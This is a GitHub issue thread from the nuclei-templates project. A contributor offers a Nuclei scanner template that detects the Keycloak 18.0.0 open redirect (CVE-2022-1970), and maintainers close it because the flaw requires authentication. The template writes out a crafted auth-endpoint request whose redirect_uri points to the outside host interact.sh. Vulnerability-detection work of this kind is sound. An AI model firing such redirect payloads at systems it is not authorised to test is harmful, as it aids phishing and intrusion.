keycloak v18.0.0 - Open Redirect

[0xr2r]

Template Information:

hi I did not find this template CVE-2022-1970 in nuclei-templates

Nuclei Template:

id: CVE-2022-1970
info:
  name: keycloak v18.0.0 - Open Redirect
  author: 0xr2r
  severity: medium
  description: |
   keycloak 18.0.0: open redirect in auth endpoint via the redirect_uri parameter.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1970
    - https://bugzilla.redhat.com/show_bug.cgi?id=2092434
    - https://github.com/syedsohaibkarim/OpenRedirect-Keycloak18.0.0
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1970
    cwe-id: CWE-601
    cpe: cpe:2.3:a:redhat:keycloak:18.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
  tags: cve,cve2022,redirect,keycloak

http:
  - method: GET
    path:
      - "{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?client_id=&redirect_uri=http%3A%2F%2Finteract.sh&state=72526a4b-d5b6-4424-90db-cc0f7c2001a7&response_mode=fragment&response_type=code&scope=openid&nonce=33e890be-c19f-463f-bd0e-7fdcd065c0fb"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'

[olearycrew]

Thanks for this contribution @x0xr2r

[ritikchaddha]

Hello @0xr2r, Thank you for sharing this template with us. However, we received it before #7448. This version has a vulnerability that could be exploited only after authentication. As far as I know, the contributor was unable to update the template with a working login request.

Therefore, It would be great if you could share the template that includes the login request.

[ritikchaddha]

Closing this issue due to inactivity. Feel free to reopen it if you have more information.